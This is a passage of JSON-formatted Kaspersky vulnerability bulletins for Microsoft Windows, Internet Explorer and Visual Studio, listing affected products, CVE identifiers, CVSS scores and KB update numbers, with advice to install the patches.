Control Panel)\n\n### *Original advisories*:\n[CVE-2021-34481](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34481>) \n\n\n### *Impacts*:\nPE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-34481](<https://vulners.com/cve/CVE-2021-34481>)4.6Warning\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-15T00:00:00", "type": "kaspersky", "title": "KLA12231 PE vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2021-07-27T00:00:00", "id": "KLA12231", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12231/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-30T14:58:28", "description": "### *Detect date*:\n06/09/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1709 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server, version 1803 (Server Core Installation) \nWindows Server 2012 R2 \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2019 \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nInternet Explorer 9 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1903 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1803 for ARM64-based Systems \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1709 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2012 \nWindows 10 Version 1903 for ARM64-based Systems \nWindows RT 8.1 \nWindows Server 2016 \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nInternet Explorer 11 \nWindows Server 2012 R2 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1903 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-1160](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1160>) \n[CVE-2020-1281](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1281>) \n[CVE-2020-1287](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1287>) \n[CVE-2020-1348](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1348>) \n[CVE-2020-1301](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1301>) \n[CVE-2020-1260](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1260>) \n[CVE-2020-1207](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1207>) \n[CVE-2020-1262](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1262>) \n[CVE-2020-1263](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1263>) \n[CVE-2020-1246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1246>) \n[CVE-2020-1247](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1247>) \n[CVE-2020-1208](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1208>) \n[CVE-2020-1300](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1300>) \n[CVE-2020-1196](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1196>) \n[CVE-2020-1194](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1194>) \n[CVE-2020-1299](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1299>) \n[CVE-2020-1291](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1291>) \n[CVE-2020-1317](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1317>) \n[CVE-2020-1239](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1239>) \n[CVE-2020-1214](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1214>) \n[CVE-2020-1236](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1236>) \n[CVE-2020-1230](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1230>) \n[CVE-2020-1314](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1314>) \n[CVE-2020-1315](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1315>) \n[CVE-2020-1213](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1213>) \n[CVE-2020-1212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1212>) \n[CVE-2020-1215](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1215>) \n[CVE-2020-1311](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1311>) \n[CVE-2020-1216](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1216>) \n[CVE-2020-1255](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1255>) \n[CVE-2020-1254](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1254>) \n[CVE-2020-1271](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1271>) \n[CVE-2020-1270](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1270>) \n[CVE-2020-1251](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1251>) \n[CVE-2020-1253](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1253>) \n[CVE-2020-1272](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1272>) \n[CVE-2020-1302](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1302>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2020-1160](<https://vulners.com/cve/CVE-2020-1160>)2.1Warning \n[CVE-2020-1281](<https://vulners.com/cve/CVE-2020-1281>)6.8High \n[CVE-2020-1287](<https://vulners.com/cve/CVE-2020-1287>)6.8High \n[CVE-2020-1348](<https://vulners.com/cve/CVE-2020-1348>)4.3Warning \n[CVE-2020-1301](<https://vulners.com/cve/CVE-2020-1301>)6.5High \n[CVE-2020-1260](<https://vulners.com/cve/CVE-2020-1260>)7.6Critical \n[CVE-2020-1207](<https://vulners.com/cve/CVE-2020-1207>)7.2High \n[CVE-2020-1262](<https://vulners.com/cve/CVE-2020-1262>)7.2High \n[CVE-2020-1263](<https://vulners.com/cve/CVE-2020-1263>)2.1Warning \n[CVE-2020-1246](<https://vulners.com/cve/CVE-2020-1246>)7.2High \n[CVE-2020-1247](<https://vulners.com/cve/CVE-2020-1247>)7.2High \n[CVE-2020-1208](<https://vulners.com/cve/CVE-2020-1208>)9.3Critical \n[CVE-2020-1300](<https://vulners.com/cve/CVE-2020-1300>)6.8High \n[CVE-2020-1196](<https://vulners.com/cve/CVE-2020-1196>)4.6Warning \n[CVE-2020-1194](<https://vulners.com/cve/CVE-2020-1194>)4.9Warning \n[CVE-2020-1299](<https://vulners.com/cve/CVE-2020-1299>)9.3Critical \n[CVE-2020-1291](<https://vulners.com/cve/CVE-2020-1291>)6.8High \n[CVE-2020-1317](<https://vulners.com/cve/CVE-2020-1317>)9.0Critical \n[CVE-2020-1239](<https://vulners.com/cve/CVE-2020-1239>)6.8High \n[CVE-2020-1214](<https://vulners.com/cve/CVE-2020-1214>)7.6Critical \n[CVE-2020-1236](<https://vulners.com/cve/CVE-2020-1236>)9.3Critical \n[CVE-2020-1230](<https://vulners.com/cve/CVE-2020-1230>)7.6Critical \n[CVE-2020-1314](<https://vulners.com/cve/CVE-2020-1314>)6.8High \n[CVE-2020-1315](<https://vulners.com/cve/CVE-2020-1315>)2.6Warning \n[CVE-2020-1213](<https://vulners.com/cve/CVE-2020-1213>)7.6Critical \n[CVE-2020-1212](<https://vulners.com/cve/CVE-2020-1212>)6.8High \n[CVE-2020-1215](<https://vulners.com/cve/CVE-2020-1215>)7.6Critical \n[CVE-2020-1311](<https://vulners.com/cve/CVE-2020-1311>)6.8High \n[CVE-2020-1216](<https://vulners.com/cve/CVE-2020-1216>)7.6Critical \n[CVE-2020-1255](<https://vulners.com/cve/CVE-2020-1255>)6.5High \n[CVE-2020-1254](<https://vulners.com/cve/CVE-2020-1254>)7.2High \n[CVE-2020-1271](<https://vulners.com/cve/CVE-2020-1271>)4.6Warning \n[CVE-2020-1270](<https://vulners.com/cve/CVE-2020-1270>)4.6Warning \n[CVE-2020-1251](<https://vulners.com/cve/CVE-2020-1251>)7.2High \n[CVE-2020-1253](<https://vulners.com/cve/CVE-2020-1253>)7.2High \n[CVE-2020-1272](<https://vulners.com/cve/CVE-2020-1272>)7.2High \n[CVE-2020-1302](<https://vulners.com/cve/CVE-2020-1302>)4.6Warning\n\n### *KB list*:\n[4561669](<http://support.microsoft.com/kb/4561669>) \n[4561603](<http://support.microsoft.com/kb/4561603>) \n[4561645](<http://support.microsoft.com/kb/4561645>) \n[4561643](<http://support.microsoft.com/kb/4561643>) \n[4561670](<http://support.microsoft.com/kb/4561670>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "kaspersky", "title": "KLA11806 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1230", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1260", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1281", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1311", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1317", "CVE-2020-1348"], "modified": "2023-03-21T00:00:00", "id": "KLA11806", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11806/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-30T14:58:28", "description": "### *Detect date*:\n06/09/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 1903 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1709 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server, version 1803 (Server Core Installation) \nWindows Server 2012 R2 \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nMicrosoft Visual Studio 2019 version 16.6 (includes 16.0 - 16.5) \nMicrosoft Visual Studio 2015 Update 3 \nWindows Server 2019 \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nMicrosoft Visual Studio 2019 version 16.4 (includes 16.0 - 16.3) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1903 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server, version 2004 (Server Core installation) \nMicrosoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1803 for ARM64-based Systems \nMicrosoft Visual Studio 2019 version 16.0 \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1709 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2012 \nWindows 10 Version 1903 for ARM64-based Systems \nWindows RT 8.1 \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2016 \nWindows 10 Version 2004 for HoloLens \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1903 for HoloLens \nWindows 10 Version 1809 for HoloLens \nWindows Server 2012 R2 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server, version 1903 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-0986](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0986>) \n[CVE-2020-1348](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1348>) \n[CVE-2020-1264](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1264>) \n[CVE-2020-1265](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1265>) \n[CVE-2020-1266](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1266>) \n[CVE-2020-1261](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1261>) \n[CVE-2020-1262](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1262>) \n[CVE-2020-1263](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1263>) \n[CVE-2020-1268](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1268>) \n[CVE-2020-1269](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1269>) \n[CVE-2020-1299](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1299>) \n[CVE-2020-1291](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1291>) \n[CVE-2020-1290](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1290>) \n[CVE-2020-1293](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1293>) \n[CVE-2020-1292](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1292>) \n[CVE-2020-1294](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1294>) \n[CVE-2020-1296](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1296>) \n[CVE-2020-1160](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1160>) \n[CVE-2020-1259](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1259>) \n[CVE-2020-1311](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1311>) \n[CVE-2020-1211](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1211>) \n[CVE-2020-1162](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1162>) \n[CVE-2020-1212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1212>) \n[CVE-2020-1217](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1217>) \n[CVE-2020-1282](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1282>) \n[CVE-2020-1283](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1283>) \n[CVE-2020-1280](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1280>) \n[CVE-2020-1281](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1281>) \n[CVE-2020-1286](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1286>) \n[CVE-2020-1287](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1287>) \n[CVE-2020-1284](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1284>) \n[CVE-2020-1202](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1202>) \n[CVE-2020-1203](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1203>) \n[CVE-2020-1201](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1201>) \n[CVE-2020-1206](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1206>) \n[CVE-2020-1207](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1207>) \n[CVE-2020-1204](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1204>) \n[CVE-2020-1324](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1324>) \n[CVE-2020-1208](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1208>) \n[CVE-2020-1209](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1209>) \n[CVE-2020-1239](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1239>) \n[CVE-2020-1238](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1238>) \n[CVE-2020-1237](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1237>) \n[CVE-2020-1236](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1236>) \n[CVE-2020-1235](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1235>) \n[CVE-2020-1234](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1234>) \n[CVE-2020-1233](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1233>) \n[CVE-2020-1232](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1232>) \n[CVE-2020-1231](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1231>) \n[CVE-2020-1334](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1334>) \n[CVE-2020-1222](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1222>) \n[CVE-2020-1309](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1309>) \n[CVE-2020-1302](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1302>) \n[CVE-2020-1301](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1301>) \n[CVE-2020-1300](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1300>) \n[CVE-2020-1307](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1307>) \n[CVE-2020-1306](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1306>) \n[CVE-2020-1305](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1305>) \n[CVE-2020-1304](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1304>) \n[CVE-2020-1196](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1196>) \n[CVE-2020-1197](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1197>) \n[CVE-2020-1194](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1194>) \n[CVE-2020-1199](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1199>) \n[CVE-2020-1120](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1120>) \n[CVE-2020-1314](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1314>) \n[CVE-2020-1316](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1316>) \n[CVE-2020-1317](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1317>) \n[CVE-2020-1310](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1310>) \n[CVE-2020-1258](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1258>) \n[CVE-2020-1312](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1312>) \n[CVE-2020-1313](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1313>) \n[CVE-2020-1255](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1255>) \n[CVE-2020-1254](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1254>) \n[CVE-2020-1257](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1257>) \n[CVE-2020-1251](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1251>) \n[CVE-2020-1253](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1253>) \n[CVE-2020-1248](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1248>) \n[CVE-2020-1246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1246>) \n[CVE-2020-1247](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1247>) \n[CVE-2020-1244](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1244>) \n[CVE-2020-1241](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1241>) \n[CVE-2020-0915](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0915>) \n[CVE-2020-0916](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0916>) \n[CVE-2020-1279](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1279>) \n[CVE-2020-1278](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1278>) \n[CVE-2020-1273](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1273>) \n[CVE-2020-1272](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1272>) \n[CVE-2020-1271](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1271>) \n[CVE-2020-1270](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1270>) \n[CVE-2020-1277](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1277>) \n[CVE-2020-1276](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1276>) \n[CVE-2020-1275](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1275>) \n[CVE-2020-1274](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1274>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Visual Studio](<https://threats.kaspersky.com/en/product/Microsoft-Visual-Studio/>)\n\n### *CVE-IDS*:\n[CVE-2020-1160](<https://vulners.com/cve/CVE-2020-1160>)2.1Warning \n[CVE-2020-1281](<https://vulners.com/cve/CVE-2020-1281>)6.8High \n[CVE-2020-1287](<https://vulners.com/cve/CVE-2020-1287>)6.8High \n[CVE-2020-1348](<https://vulners.com/cve/CVE-2020-1348>)4.3Warning \n[CVE-2020-1301](<https://vulners.com/cve/CVE-2020-1301>)6.5High \n[CVE-2020-1207](<https://vulners.com/cve/CVE-2020-1207>)7.2High \n[CVE-2020-1262](<https://vulners.com/cve/CVE-2020-1262>)7.2High \n[CVE-2020-1263](<https://vulners.com/cve/CVE-2020-1263>)2.1Warning \n[CVE-2020-1246](<https://vulners.com/cve/CVE-2020-1246>)7.2High \n[CVE-2020-1247](<https://vulners.com/cve/CVE-2020-1247>)7.2High \n[CVE-2020-1208](<https://vulners.com/cve/CVE-2020-1208>)9.3Critical \n[CVE-2020-1300](<https://vulners.com/cve/CVE-2020-1300>)6.8High \n[CVE-2020-1196](<https://vulners.com/cve/CVE-2020-1196>)4.6Warning \n[CVE-2020-1194](<https://vulners.com/cve/CVE-2020-1194>)4.9Warning \n[CVE-2020-1299](<https://vulners.com/cve/CVE-2020-1299>)9.3Critical \n[CVE-2020-1291](<https://vulners.com/cve/CVE-2020-1291>)6.8High \n[CVE-2020-1317](<https://vulners.com/cve/CVE-2020-1317>)9.0Critical \n[CVE-2020-1239](<https://vulners.com/cve/CVE-2020-1239>)6.8High \n[CVE-2020-1236](<https://vulners.com/cve/CVE-2020-1236>)9.3Critical \n[CVE-2020-1314](<https://vulners.com/cve/CVE-2020-1314>)6.8High \n[CVE-2020-1212](<https://vulners.com/cve/CVE-2020-1212>)6.8High 